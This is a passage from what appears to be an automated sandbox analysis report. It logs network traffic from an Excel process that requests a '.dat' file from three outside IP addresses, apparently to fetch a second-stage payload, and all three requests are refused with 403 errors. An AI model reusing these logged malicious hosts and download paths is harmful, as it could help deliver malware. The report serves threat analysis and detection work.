                                                                                                                                                May 4, 2021 18:27:41.520831108 CEST80497225.34.179.36192.168.2.6
                                                                                                                                                May 4, 2021 18:27:41.950759888 CEST80497225.34.179.36192.168.2.6
                                                                                                                                                May 4, 2021 18:27:41.951782942 CEST4972280192.168.2.65.34.179.36
                                                                                                                                                May 4, 2021 18:27:41.957674026 CEST4972380192.168.2.645.153.229.23
                                                                                                                                                May 4, 2021 18:27:42.022432089 CEST804972345.153.229.23192.168.2.6
                                                                                                                                                May 4, 2021 18:27:42.022526026 CEST4972380192.168.2.645.153.229.23
                                                                                                                                                May 4, 2021 18:27:42.023101091 CEST4972380192.168.2.645.153.229.23
                                                                                                                                                May 4, 2021 18:27:42.087676048 CEST804972345.153.229.23192.168.2.6
                                                                                                                                                May 4, 2021 18:27:42.148572922 CEST804972345.153.229.23192.168.2.6
                                                                                                                                                May 4, 2021 18:27:42.148631096 CEST4972380192.168.2.645.153.229.23
                                                                                                                                                May 4, 2021 18:28:46.180049896 CEST804972091.211.91.81192.168.2.6
                                                                                                                                                May 4, 2021 18:28:46.180279016 CEST4972080192.168.2.691.211.91.81
                                                                                                                                                May 4, 2021 18:28:46.951474905 CEST80497225.34.179.36192.168.2.6
                                                                                                                                                May 4, 2021 18:28:46.951672077 CEST4972280192.168.2.65.34.179.36
                                                                                                                                                May 4, 2021 18:28:47.149940014 CEST804972345.153.229.23192.168.2.6
                                                                                                                                                May 4, 2021 18:28:47.150105953 CEST4972380192.168.2.645.153.229.23
                                                                                                                                                May 4, 2021 18:29:22.367482901 CEST4972380192.168.2.645.153.229.23
                                                                                                                                                May 4, 2021 18:29:22.367686987 CEST4972280192.168.2.65.34.179.36
                                                                                                                                                May 4, 2021 18:29:22.367860079 CEST4972080192.168.2.691.211.91.81
                                                                                                                                                May 4, 2021 18:29:22.432441950 CEST804972345.153.229.23192.168.2.6
                                                                                                                                                May 4, 2021 18:29:22.452354908 CEST804972091.211.91.81192.168.2.6
                                                                                                                                                May 4, 2021 18:29:22.512753963 CEST80497225.34.179.36192.168.2.6

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                May 4, 2021 18:27:18.094810963 CEST53620448.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:18.899960995 CEST6379153192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:18.950412989 CEST53637918.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:19.804089069 CEST6426753192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:19.852813005 CEST53642678.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:20.939779043 CEST4944853192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:20.999002934 CEST53494488.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:21.270270109 CEST6034253192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:21.322411060 CEST53603428.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:22.188952923 CEST6134653192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:22.237730980 CEST53613468.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:23.015486956 CEST5177453192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:23.064205885 CEST53517748.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:24.415584087 CEST5602353192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:24.464157104 CEST53560238.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:25.290689945 CEST5838453192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:25.341984034 CEST53583848.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:25.632792950 CEST6026153192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:25.689579964 CEST53602618.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:26.988132000 CEST5606153192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:27.045090914 CEST53560618.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:31.084626913 CEST5833653192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:31.133912086 CEST53583368.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:32.396502972 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:32.456934929 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:32.840955019 CEST5406453192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:32.905101061 CEST53540648.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:33.849351883 CEST5406453192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:34.082928896 CEST53540648.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:34.895292997 CEST5406453192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:35.115504980 CEST53540648.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:36.493490934 CEST5281153192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:36.546812057 CEST53528118.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:36.911353111 CEST5406453192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:36.982091904 CEST53540648.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:39.002782106 CEST5529953192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:39.063780069 CEST53552998.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:39.972990036 CEST6374553192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:40.021666050 CEST53637458.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:40.927424908 CEST5406453192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:40.978377104 CEST53540648.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:41.033668041 CEST5005553192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:41.082216978 CEST53500558.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:42.093231916 CEST6137453192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:42.141829014 CEST53613748.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:43.210931063 CEST6137453192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:43.260364056 CEST53613748.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:45.937283993 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:45.986340046 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:47.150325060 CEST6330753192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:47.209270000 CEST53633078.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:48.326251030 CEST4969453192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:48.374960899 CEST53496948.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:53.615267992 CEST5498253192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:53.663891077 CEST53549828.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:27:57.820399046 CEST5001053192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:27:57.883830070 CEST53500108.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:28:14.126549006 CEST6371853192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:28:14.184225082 CEST53637188.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:28:14.685036898 CEST6211653192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:28:14.826639891 CEST53621168.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:28:15.473815918 CEST6381653192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:28:15.533023119 CEST53638168.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:28:15.674973011 CEST5501453192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:28:15.746151924 CEST53550148.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:28:15.977458000 CEST6220853192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:28:16.030518055 CEST53622088.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:28:16.566937923 CEST5757453192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:28:16.617942095 CEST53575748.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:28:17.194921017 CEST5181853192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:28:17.252612114 CEST53518188.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:28:18.256756067 CEST5662853192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:28:18.308296919 CEST53566288.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:28:19.781204939 CEST6077853192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:28:19.838218927 CEST53607788.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:28:20.614972115 CEST5379953192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:28:20.677949905 CEST53537998.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:28:21.217336893 CEST5468353192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:28:21.358124971 CEST53546838.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:28:29.811558962 CEST5932953192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:28:29.861965895 CEST53593298.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:28:58.165365934 CEST6402153192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:28:58.254754066 CEST53640218.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:29:01.226980925 CEST5612953192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:29:01.275686026 CEST53561298.8.8.8192.168.2.6
                                                                                                                                                May 4, 2021 18:29:03.200608015 CEST5817753192.168.2.68.8.8.8
                                                                                                                                                May 4, 2021 18:29:03.266186953 CEST53581778.8.8.8192.168.2.6

                                                                                                                                                ICMP Packets

                                                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                May 4, 2021 18:27:43.260519028 CEST192.168.2.68.8.8.8d07a(Port unreachable)Destination Unreachable

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • 91.211.91.81
                                                                                                                                                • 5.34.179.36
                                                                                                                                                • 45.153.229.23

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                0192.168.2.64972091.211.91.8180C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                May 4, 2021 18:27:41.030962944 CEST1127OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 91.211.91.81
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                May 4, 2021 18:27:41.178436995 CEST1129INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 16:27:41 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                1192.168.2.6497225.34.179.3680C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                May 4, 2021 18:27:41.374579906 CEST1130OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 5.34.179.36
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                May 4, 2021 18:27:41.950759888 CEST1142INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 16:27:41 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                2192.168.2.64972345.153.229.2380C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                May 4, 2021 18:27:42.023101091 CEST1143OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 45.153.229.23
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                May 4, 2021 18:27:42.148572922 CEST1144INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 16:27:42 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:18:27:30
                                                                                                                                                Start date:04/05/2021
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                Imagebase:0x2b0000
                                                                                                                                                File size:27110184 bytes
                                                                                                                                                MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Reset < >